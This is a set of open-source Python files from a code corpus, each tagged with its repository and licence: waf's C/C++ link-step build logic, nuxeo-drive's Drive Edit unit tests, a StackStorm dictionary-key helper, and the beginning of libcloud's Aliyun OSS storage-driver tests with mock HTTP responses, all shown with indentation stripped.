if preproc.go_absolute:
node=self.bld.root.find_dir(path)
elif path[0]=='#':
node=self.bld.srcnode
if len(path)>1:
node=node.find_dir(path[1:])
else:
node=self.path.find_dir(path)
if node:
self.env.append_value('INC_PATHS',node)
if USE_TOP_LEVEL:
self.env.append_value('INC_PATHS',self.bld.srcnode)
def apply_type_vars(self):
for x in self.features:
if not x in['cprogram','cstaticlib','cshlib']:
continue
x=x.lstrip('c')
st=self.env[x+'_USELIB']
if st:self.uselib=self.uselib+' '+st
for var in self.p_type_vars:
compvar='%s_%s'%(x,var)
value=self.env[compvar]
if value:self.env.append_value(var,value)
def apply_link(self):
link=getattr(self,'link',None)
if not link:
if'cstaticlib'in self.features:link='ar_link_static'
elif'cxx'in self.features:link='cxx_link'
else:link='cc_link'
if'cshlib'in self.features:
if win_platform:
link='dll_'+link
elif getattr(self,'vnum',''):
if sys.platform=='darwin':
self.vnum=''
else:
link='vnum_'+link
tsk=self.create_task(link)
outputs=[t.outputs[0]for t in self.compiled_tasks]
tsk.set_inputs(outputs)
tsk.set_outputs(self.path.find_or_declare(get_target_name(self)))
tsk.chmod=self.chmod
self.link_task=tsk
def apply_lib_vars(self):
env=self.env
uselib=self.to_list(self.uselib)
seen=[]
names=self.to_list(self.uselib_local)[:]
while names:
x=names.pop(0)
if x in seen:
continue
y=self.name_to_obj(x)
if not y:
raise Utils.WafError("object '%s' was not found in uselib_local (required by '%s')"%(x,self.name))
if getattr(y,'uselib_local',None):
lst=y.to_list(y.uselib_local)
for u in lst:
if not u in seen:
names.append(u)
y.post()
seen.append(x)
libname=y.target[y.target.rfind(os.sep)+1:]
if'cshlib'in y.features or'cprogram'in y.features:
env.append_value('LIB',libname)
elif'cstaticlib'in y.features:
env.append_value('STATICLIB',libname)
if y.link_task is not None:
self.link_task.set_run_after(y.link_task)
dep_nodes=getattr(self.link_task,'dep_nodes',[])
self.link_task.dep_nodes=dep_nodes+y.link_task.outputs
tmp_path=y.link_task.outputs[0].parent.bldpath(self.env)
if not tmp_path in env['LIBPATH']:env.prepend_value('LIBPATH',tmp_path)
morelibs=y.to_list(y.uselib)
for v in morelibs:
if v in uselib:continue
uselib=[v]+uselib
if getattr(y,'export_incdirs',None):
cpppath_st=self.env['CPPPATH_ST']
for x in self.to_list(y.export_incdirs):
node=y.path.find_dir(x)
if not node:
raise Utils.WafError('object %s: invalid folder %s in export_incdirs'%(y.target,x))
self.env.append_unique('INC_PATHS',node)
for x in uselib:
for v in self.p_flag_vars:
val=self.env[v+'_'+x]
if val:self.env.append_value(v,val)
def apply_objdeps(self):
if not getattr(self,'add_objects',None):return
seen=[]
names=self.to_list(self.add_objects)
while names:
x=names[0]
if x in seen:
names=names[1:]
continue
y=self.name_to_obj(x)
if not y:
raise Utils.WafError("object '%s' was not found in uselib_local (required by add_objects '%s')"%(x,self.name))
if getattr(y,'add_objects',None):
added=0
lst=y.to_list(y.add_objects)
lst.reverse()
for u in lst:
if u in seen:continue
added=1
names=[u]+names
if added:continue
y.post()
seen.append(x)
for t in y.compiled_tasks:
self.link_task.inputs.extend(t.outputs)
def apply_obj_vars(self):
v=self.env
lib_st=v['LIB_ST']
staticlib_st=v['STATICLIB_ST']
libpath_st=v['LIBPATH_ST']
staticlibpath_st=v['STATICLIBPATH_ST']
rpath_st=v['RPATH_ST']
app=v.append_unique
if v['FULLSTATIC']:
v.append_value('LINKFLAGS',v['FULLSTATIC_MARKER'])
for i in v['RPATH']:
if i and rpath_st:
app('LINKFLAGS',rpath_st%i)
for i in v['LIBPATH']:
app('LINKFLAGS',libpath_st%i)
app('LINKFLAGS',staticlibpath_st%i)
if v['STATICLIB']:
v.append_value('LINKFLAGS',v['STATICLIB_MARKER'])
k=[(staticlib_st%i)for i in v['STATICLIB']]
app('LINKFLAGS',k)
if not v['FULLSTATIC']:
if v['STATICLIB']or v['LIB']:
v.append_value('LINKFLAGS',v['SHLIB_MARKER'])
app('LINKFLAGS',[lib_st%i for i in v['LIB']])
def apply_vnum(self):
if sys.platform not in('win32','cygwin','darwin'):
try:
nums=self.vnum.split('.')
except AttributeError:
pass
else:
try:name3=self.soname
except AttributeError:name3=self.link_task.outputs[0].name+'.'+nums[0]
self.link_task.outputs.append(self.link_task.outputs[0].parent.find_or_declare(name3))
self.env.append_value('LINKFLAGS',(self.env['SONAME_ST']%name3).split())
def apply_implib(self):
if win_platform:
dll=self.link_task.outputs[0]
implib=dll.parent.find_or_declare(self.env['implib_PATTERN']%os.path.split(self.target)[1])
self.link_task.outputs.append(implib)
if sys.platform=='cygwin':
pass
elif sys.platform=='win32':
self.env.append_value('LINKFLAGS',(self.env['IMPLIB_ST']%implib.bldpath(self.env)).split())
self.link_task.install=install_implib
def process_obj_files(self):
if not hasattr(self,'obj_files'):return
for x in self.obj_files:
node=self.path.find_resource(x)
self.link_task.inputs.append(node)
def add_obj_file(self,file):
if not hasattr(self,'obj_files'):self.obj_files=[]
if not'process_obj_files'in self.meths:self.meths.append('process_obj_files')
self.obj_files.append(file)
c_attrs={'cxxflag':'CXXFLAGS','cflag':'CCFLAGS','ccflag':'CCFLAGS','linkflag':'LINKFLAGS','ldflag':'LINKFLAGS','lib':'LIB','libpath':'LIBPATH','staticlib':'STATICLIB','staticlibpath':'STATICLIBPATH','rpath':'RPATH','framework':'FRAMEWORK','frameworkpath':'FRAMEWORKPATH'}
def add_extra_flags(self):
for x in self.__dict__.keys():
y=x.lower()
if y[-1]=='s':
y=y[:-1]
if c_attrs.get(y,None):
self.env.append_unique(c_attrs[y],getattr(self,x))
def link_vnum(self):
clsname=self.__class__.__name__.replace('vnum_','')
out=self.outputs
self.outputs=out[1:]
ret=Task.TaskBase.classes[clsname].__dict__['run'](self)
self.outputs=out
if ret:
return ret
try:
os.remove(self.outputs[0].abspath(self.env))
except OSError:
pass
try:
os.symlink(self.outputs[1].name,self.outputs[0].bldpath(self.env))
except:
return 1
def post_dll_link(self):
if sys.platform=='cygwin':
try:
os.remove(self.outputs[1].abspath(self.env))
except OSError:
pass
try:
os.symlink(self.outputs[0].name,self.outputs[1].bldpath(self.env))
except:
return 1
feature('cc','cxx')(default_cc)
before('apply_core')(default_cc)
feature('cprogram','dprogram','cstaticlib','dstaticlib','cshlib','dshlib')(apply_verif)
feature('cprogram','dprogram')(vars_target_cprogram)
before('apply_core')(vars_target_cprogram)
feature('cstaticlib','dstaticlib')(vars_target_cstaticlib)
before('apply_core')(vars_target_cstaticlib)
feature('cshlib','dshlib')(vars_target_cshlib)
before('apply_core')(vars_target_cshlib)
feature('cprogram','dprogram','cstaticlib','dstaticlib','cshlib','dshlib')(install_target_cstaticlib)
after('apply_objdeps','apply_link')(install_target_cstaticlib)
feature('cshlib','dshlib')(install_target_cshlib)
after('apply_link')(install_target_cshlib)
feature('cc','cxx')(apply_incpaths)
after('apply_type_vars','apply_lib_vars','apply_core')(apply_incpaths)
feature('cc','cxx')(apply_type_vars)
after('init_cc','init_cxx')(apply_type_vars)
before('apply_lib_vars')(apply_type_vars)
feature('cprogram','cshlib','cstaticlib')(apply_link)
after('apply_core')(apply_link)
feature('cc','cxx')(apply_lib_vars)
after('apply_link','init_cc','init_cxx')(apply_lib_vars)
feature('cprogram','cstaticlib','cshlib')(apply_objdeps)
after('apply_obj_vars','apply_vnum','apply_implib','apply_link')(apply_objdeps)
feature('cprogram','cshlib','cstaticlib')(apply_obj_vars)
after('apply_lib_vars')(apply_obj_vars)
feature('cshlib')(apply_vnum)
after('apply_link')(apply_vnum)
before('apply_lib_vars')(apply_vnum)
feature('implib')(apply_implib)
after('apply_link')(apply_implib)
before('apply_lib_vars')(apply_implib)
after('apply_link')(process_obj_files)
taskgen(add_obj_file)
feature('cc','cxx')(add_extra_flags)
before('init_cxx','init_cc')(add_extra_flags)
before('apply_lib_vars','apply_obj_vars','apply_incpaths','init_cc')(add_extra_flags)
| micove/libdesktop-agnostic | wafadmin/Tools/ccroot.py | Python | lgpl-2.1 | 13,478 |
import os
import time
from nose.plugins.skip import SkipTest
from nxdrive.client import LocalClient
from nxdrive.tests.common import OS_STAT_MTIME_RESOLUTION
from nxdrive.client.common import LOCALLY_EDITED_FOLDER_NAME
from nxdrive.tests.common_unit_test import UnitTestCase
DRIVE_EDIT_XATTR_NAMES = ['ndrive', 'nxdriveedit', 'nxdriveeditdigest', 'nxdriveeditname']
class TestDriveEdit(UnitTestCase):
locally_edited_path = ('/default-domain/UserWorkspaces/'
+ 'nuxeoDriveTestUser-user-1/Collections/'
+ LOCALLY_EDITED_FOLDER_NAME)
def setUpApp(self):
super(TestDriveEdit, self).setUpApp()
self.drive_edit = self.manager_1.get_drive_edit()
self.drive_edit.driveEditUploadCompleted.connect(self.app.sync_completed)
self.drive_edit.start()
self.remote = self.remote_document_client_1
self.local = LocalClient(os.path.join(self.nxdrive_conf_folder_1, 'edit'))
def tearDownApp(self):
self.drive_edit.stop()
super(TestDriveEdit, self).tearDownApp()
def test_filename_encoding(self):
filename = u'Mode op\xe9ratoire.txt'
doc_id = self.remote.make_file('/', filename, 'Some content.')
# Linux / Win + Chrome: quoted utf-8 encoded
browser_filename = 'Mode%20op%C3%A9ratoire.txt'
self._drive_edit_update(doc_id, filename, browser_filename, 'Win + Chrome')
# Win + IE: unquoted utf-8 encoded
browser_filename = 'Mode op\xc3\xa9ratoire.txt'
self._drive_edit_update(doc_id, filename, browser_filename, 'Win + IE')
# Win + FF: quoted string containing unicode
browser_filename = 'Mode%20op\xe9ratoire.txt'
self._drive_edit_update(doc_id, filename, browser_filename, 'Win + FF')
# OSX + Chrome / OSX + FF: quoted utf-8 encoded, except for white spaces!
browser_filename = 'Mode op%C3%A9ratoire.txt'
self._drive_edit_update(doc_id, filename, browser_filename, 'OS X + Chrome or FF')
def _drive_edit_update(self, doc_id, filename, browser_filename, content):
# Download file
local_path = '/%s/%s' % (doc_id, filename)
self.drive_edit._prepare_edit(self.nuxeo_url, doc_id, browser_filename)
self.assertTrue(self.local.exists(local_path))
self.wait_sync(timeout=2, fail_if_timeout=False)
# Update file content
self.local.update_content(local_path, content)
self.wait_sync()
self.assertEquals(self.remote.get_content('/' + filename), content)
def test_drive_edit_non_synced_doc(self):
raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
ctl = self.controller_1
ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
self.user_1, self.password_1)
local = LocalClient(self.local_nxdrive_folder_1)
remote = self.remote_document_client_1
syn = ctl.synchronizer
# Create file in test workspace (non sync root)
doc_id = remote.make_file('/', 'test.odt', 'Some content.')
# Drive edit file
ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
open_file=False)
# Check file is downloaded to the Locally Edited folder
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
self.assertEquals(local.get_content('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME),
'Some content.')
# Check Locally Edited collection exists, is registered as a sync root
# for test user and file is member of it
self.assertTrue(self.root_remote_client.exists(
self.locally_edited_path))
sync_roots = remote.get_roots()
self.assertEquals(len(sync_roots), 1)
self.assertEquals(sync_roots[0].path, self.locally_edited_path)
self.assertTrue(doc_id in
self.root_remote_client.get_collection_members(
self.locally_edited_path))
# Update locally edited file
# Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
self._sync(syn)
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
'Updated content.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/test.odt'), 'Updated content.')
# Drive edit file a second time (should not download a new file but
# detect the existing one)
ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
open_file=False)
self.assertEquals(len(local.get_children_info('/%s'
% LOCALLY_EDITED_FOLDER_NAME)), 1)
# Update locally edited file
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
'Twice updated content.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/test.odt'),
'Twice updated content.')
def test_drive_edit_synced_doc(self):
raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
ctl = self.controller_1
ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
self.user_1, self.password_1)
ctl.bind_root(self.local_nxdrive_folder_1, self.workspace)
local = LocalClient(self.local_nxdrive_folder_1)
remote = self.remote_document_client_1
syn = ctl.synchronizer
# Create file in test workspace (sync root)
doc_id = remote.make_file('/', 'test.odt', 'Some content.')
# Launch first synchronization
self._sync(syn)
self.assertTrue(local.exists('/%s/test.odt' % self.workspace_title))
# Drive edit file
ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
open_file=False)
# Check file is downloaded to the Locally Edited folder
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
self.assertEquals(local.get_content('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME),
'Some content.')
# Update locally edited file
# Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
self._sync(syn)
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
'Content updated from Locally Edited.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/test.odt'),
'Content updated from Locally Edited.')
self._sync(syn)
self.assertEquals(local.get_content('/%s/test.odt'
% self.workspace_title),
'Content updated from Locally Edited.')
# Update file in local sync root
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % self.workspace_title,
'Content updated from local sync root.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/test.odt'),
'Content updated from local sync root.')
self._sync(syn)
self.assertEquals(local.get_content('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME),
'Content updated from local sync root.')
# Update file in remote sync root
remote.update_content('/test.odt',
'Content updated from remote sync root.')
self._sync(syn)
self.assertEquals(local.get_content('/%s/test.odt'
% self.workspace_title),
'Content updated from remote sync root.')
self.assertEquals(local.get_content('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME),
'Content updated from remote sync root.')
def test_drive_edit_doc_becoming_synced(self):
raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
ctl = self.controller_1
ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
self.user_1, self.password_1)
local = LocalClient(self.local_nxdrive_folder_1)
remote = self.remote_document_client_1
syn = ctl.synchronizer
# Create file in test workspace (non sync root)
doc_id = remote.make_file('/', 'test.odt', 'Some content.')
# Drive edit file
ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
open_file=False)
# Check file is downloaded to the Locally Edited folder
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
# Register test workspace as a sync root
ctl.bind_root(self.local_nxdrive_folder_1, self.workspace)
self._sync(syn)
self.assertTrue(local.exists('/%s/test.odt' % self.workspace_title))
# Update file in local sync root
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % self.workspace_title,
'Content updated from local sync root.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/test.odt'),
'Content updated from local sync root.')
self._sync(syn)
self.assertEquals(local.get_content('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME),
'Content updated from local sync root.')
# Update locally edited file
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
'Content updated from Locally Edited.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/test.odt'),
'Content updated from Locally Edited.')
self._sync(syn)
self.assertEquals(local.get_content('/%s/test.odt'
% self.workspace_title),
'Content updated from Locally Edited.')
# Update file in remote sync root
remote.update_content('/test.odt',
'Content updated from remote sync root.')
self._sync(syn)
self.assertEquals(local.get_content('/%s/test.odt'
% self.workspace_title),
'Content updated from remote sync root.')
self.assertEquals(local.get_content('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME),
'Content updated from remote sync root.')
def test_drive_edit_remote_move_non_sync_root_to_sync_root(self):
raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-184")
ctl = self.controller_1
ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
self.user_1, self.password_1)
local = LocalClient(self.local_nxdrive_folder_1)
remote = self.remote_document_client_1
syn = ctl.synchronizer
# Create file in test workspace (non sync root)
doc_id = remote.make_file('/', 'test.odt', 'Some content.')
# Drive edit file
ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
open_file=False)
# Check file is downloaded to the Locally Edited folder
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
# Update locally edited file
# Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
self._sync(syn)
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
'Updated content.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/test.odt'), 'Updated content.')
# Register a folder as sync root and remotely move file to it
sync_root_id = remote.make_folder('/', 'syncRoot')
ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id)
self._sync(syn)
self.assertTrue(local.exists('/syncRoot'))
remote.move('/test.odt', '/syncRoot')
self._sync(syn)
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
self.assertTrue(local.exists('/syncRoot/test.odt'))
def test_drive_edit_remote_move_sync_root_to_non_sync_root(self):
raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
ctl = self.controller_1
ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
self.user_1, self.password_1)
local = LocalClient(self.local_nxdrive_folder_1)
remote = self.remote_document_client_1
syn = ctl.synchronizer
# Create folder, register it as a sync root and create file inside it
sync_root_id = remote.make_folder('/', 'syncRoot')
ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id)
doc_id = remote.make_file(sync_root_id, 'test.odt', 'Some content.')
# Launch first synchronization
self._sync(syn)
self.assertTrue(local.exists('/syncRoot/test.odt'))
# Drive edit file
ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
open_file=False)
# Check file is downloaded to the Locally Edited folder
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
# Update locally edited file
# Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
self._sync(syn)
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
'Content updated from Locally Edited.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/syncRoot/test.odt'),
'Content updated from Locally Edited.')
self._sync(syn)
self.assertEquals(local.get_content('/syncRoot/test.odt'),
'Content updated from Locally Edited.')
# Move file to non sync root workspace
remote.move('/syncRoot/test.odt', self.workspace)
self._sync(syn)
self.assertFalse(local.exists('/syncRoot/test.odt'))
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
self.assertEquals(len(local.get_children_info('/%s'
% LOCALLY_EDITED_FOLDER_NAME)), 1)
def test_drive_edit_move_sync_root_to_sync_root(self):
raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
ctl = self.controller_1
ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
self.user_1, self.password_1)
local = LocalClient(self.local_nxdrive_folder_1)
remote = self.remote_document_client_1
syn = ctl.synchronizer
# Create 2 folders, register them as sync roots and create file inside first folder
sync_root_id1 = remote.make_folder('/', 'syncRoot1')
sync_root_id2 = remote.make_folder('/', 'syncRoot2')
ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id1)
ctl.bind_root(self.local_nxdrive_folder_1, sync_root_id2)
doc_id = remote.make_file(sync_root_id1, 'test.odt', 'Some content.')
# Launch first synchronization
self._sync(syn)
self.assertTrue(local.exists('/syncRoot1/test.odt'))
self.assertTrue(local.exists('/syncRoot2'))
# Drive edit file
ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
open_file=False)
# Check file is downloaded to the Locally Edited folder
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
# Update locally edited file
# Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
self._sync(syn)
time.sleep(OS_STAT_MTIME_RESOLUTION)
local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
'Content updated from Locally Edited.')
self._sync(syn, wait_for_async=False)
self.assertEquals(remote.get_content('/syncRoot1/test.odt'),
'Content updated from Locally Edited.')
self._sync(syn)
self.assertEquals(local.get_content('/syncRoot1/test.odt'),
'Content updated from Locally Edited.')
# Remotely move file to other sync root
remote.move('/syncRoot1/test.odt', '/syncRoot2')
self._sync(syn)
self.assertFalse(local.exists('/syncRoot1/test.odt'))
self.assertTrue(local.exists('/syncRoot2/test.odt'))
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
self.assertEquals(len(local.get_children_info('/%s'
% LOCALLY_EDITED_FOLDER_NAME)), 1)
# Locally move back file to other sync root
local.move('/syncRoot2/test.odt', '/syncRoot1')
self._sync(syn, wait_for_async=False)
self.assertFalse(local.exists('/syncRoot2/test.odt'))
self.assertTrue(local.exists('/syncRoot1/test.odt'))
self.assertTrue(local.exists('/%s/test.odt'
% LOCALLY_EDITED_FOLDER_NAME))
self.assertEquals(len(local.get_children_info('/%s'
% LOCALLY_EDITED_FOLDER_NAME)), 1)
def _sync(self, syn, wait_for_async=True):
if wait_for_async:
self.wait()
syn.loop(delay=0, max_loops=1)
| loopingz/nuxeo-drive | nuxeo-drive-client/nxdrive/tests/test_drive_edit.py | Python | lgpl-2.1 | 18,778 |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
__all__ = [
'prefix_dict_keys'
]
def prefix_dict_keys(dictionary, prefix='_'):
"""
Prefix dictionary keys with a provided prefix.
:param dictionary: Dictionary whose keys to prefix.
:type dictionary: ``dict``
:param prefix: Key prefix.
:type prefix: ``str``
:rtype: ``dict``:
"""
result = {}
for key, value in six.iteritems(dictionary):
result['%s%s' % (prefix, key)] = value
return result
| jtopjian/st2 | st2common/st2common/util/misc.py | Python | apache-2.0 | 1,245 |
# -*- coding=utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import os
import sys
import unittest
try:
import mock
except ImportError:
from unittest import mock
from libcloud.utils.py3 import b
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import urlparse
from libcloud.utils.py3 import parse_qs
from libcloud.common.types import InvalidCredsError
from libcloud.storage.base import Container, Object
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import InvalidContainerNameError
from libcloud.storage.types import ObjectDoesNotExistError
from libcloud.storage.types import ObjectHashMismatchError
from libcloud.storage.drivers.oss import OSSConnection
from libcloud.storage.drivers.oss import OSSStorageDriver
from libcloud.storage.drivers.oss import CHUNK_SIZE
from libcloud.storage.drivers.dummy import DummyIterator
from libcloud.test import MockHttp, generate_random_data, make_response # pylint: disable-msg=E0611
from libcloud.test.file_fixtures import StorageFileFixtures # pylint: disable-msg=E0611
from libcloud.test.secrets import STORAGE_OSS_PARAMS
class OSSConnectionTestCase(unittest.TestCase):
def setUp(self):
self.conn = OSSConnection('44CF9590006BF252F707',
'OtxrzxIsfpFjA7SwPzILwy8Bw21TLhquhboDYROV')
def test_signature(self):
expected = b('26NBxoKdsyly4EDv6inkoDft/yA=')
headers = {
'Content-MD5': 'ODBGOERFMDMzQTczRUY3NUE3NzA5QzdFNUYzMDQxNEM=',
'Content-Type': 'text/html',
'Expires': 'Thu, 17 Nov 2005 18:49:58 GMT',
'X-OSS-Meta-Author': 'foo@bar.com',
'X-OSS-Magic': 'abracadabra',
'Host': 'oss-example.oss-cn-hangzhou.aliyuncs.com'
}
action = '/oss-example/nelson'
actual = OSSConnection._get_auth_signature('PUT', headers, {},
headers['Expires'],
self.conn.key,
action,
'x-oss-')
self.assertEqual(expected, actual)
class ObjectTestCase(unittest.TestCase):
def test_object_with_chinese_name(self):
driver = OSSStorageDriver(*STORAGE_OSS_PARAMS)
obj = Object(name='中文', size=0, hash=None, extra=None,
meta_data=None, container=None, driver=driver)
self.assertTrue(obj.__repr__() is not None)
class OSSMockHttp(MockHttp, unittest.TestCase):
fixtures = StorageFileFixtures('oss')
base_headers = {}
def _unauthorized(self, method, url, body, headers):
return (httplib.UNAUTHORIZED,
'',
self.base_headers,
httplib.responses[httplib.OK])
def _list_containers_empty(self, method, url, body, headers):
body = self.fixtures.load('list_containers_empty.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _list_containers(self, method, url, body, headers):
body = self.fixtures.load('list_containers.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _list_container_objects_empty(self, method, url, body, headers):
body = self.fixtures.load('list_container_objects_empty.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _list_container_objects(self, method, url, body, headers):
body = self.fixtures.load('list_container_objects.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _list_container_objects_chinese(self, method, url, body, headers):
body = self.fixtures.load('list_container_objects_chinese.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _list_container_objects_prefix(self, method, url, body, headers):
params = {'prefix': self.test.prefix}
self.assertUrlContainsQueryParams(url, params)
body = self.fixtures.load('list_container_objects_prefix.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _get_container(self, method, url, body, headers):
return self._list_containers(method, url, body, headers)
def _get_object(self, method, url, body, headers):
return self._list_containers(method, url, body, headers)
def _notexisted_get_object(self, method, url, body, headers):
return (httplib.NOT_FOUND,
body,
self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _test_get_object(self, method, url, body, headers):
self.base_headers.update(
{'accept-ranges': 'bytes',
'connection': 'keep-alive',
'content-length': '0',
'content-type': 'application/octet-stream',
'date': 'Sat, 16 Jan 2016 15:38:14 GMT',
'etag': '"D41D8CD98F00B204E9800998ECF8427E"',
'last-modified': 'Fri, 15 Jan 2016 14:43:15 GMT',
'server': 'AliyunOSS',
'x-oss-object-type': 'Normal',
'x-oss-request-id': '569A63E6257784731E3D877F',
'x-oss-meta-rabbits': 'monkeys'})
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _invalid_name(self, method, url, body, headers):
# test_create_container_bad_request
return (httplib.BAD_REQUEST,
body,
headers,
httplib.responses[httplib.OK])
def _already_exists(self, method, url, body, headers):
# test_create_container_already_existed
return (httplib.CONFLICT,
body,
headers,
httplib.responses[httplib.OK])
def _create_container(self, method, url, body, headers):
# test_create_container_success
self.assertEqual('PUT', method)
self.assertEqual('', body)
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _create_container_location(self, method, url, body, headers):
# test_create_container_success
self.assertEqual('PUT', method)
location_constraint = ('<CreateBucketConfiguration>'
'<LocationConstraint>%s</LocationConstraint>'
'</CreateBucketConfiguration>' %
self.test.ex_location)
self.assertEqual(location_constraint, body)
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _delete_container_doesnt_exist(self, method, url, body, headers):
# test_delete_container_doesnt_exist
return (httplib.NOT_FOUND,
body,
headers,
httplib.responses[httplib.OK])
def _delete_container_not_empty(self, method, url, body, headers):
# test_delete_container_not_empty
return (httplib.CONFLICT,
body,
headers,
httplib.responses[httplib.OK])
def _delete_container(self, method, url, body, headers):
return (httplib.NO_CONTENT,
body,
self.base_headers,
httplib.responses[httplib.NO_CONTENT])
def _foo_bar_object_not_found(self, method, url, body, headers):
# test_delete_object_not_found
return (httplib.NOT_FOUND,
body,
headers,
httplib.responses[httplib.OK])
def _foo_bar_object_delete(self, method, url, body, headers):
# test_delete_object
return (httplib.NO_CONTENT,
body,
headers,
httplib.responses[httplib.OK])
def _list_multipart(self, method, url, body, headers):
query_string = urlparse.urlsplit(url).query
query = parse_qs(query_string)
if 'key-marker' not in query:
body = self.fixtures.load('ex_iterate_multipart_uploads_p1.xml')
else:
body = self.fixtures.load('ex_iterate_multipart_uploads_p2.xml')
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _foo_bar_object(self, method, url, body, headers):
# test_download_object_success
body = generate_random_data(1000)
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
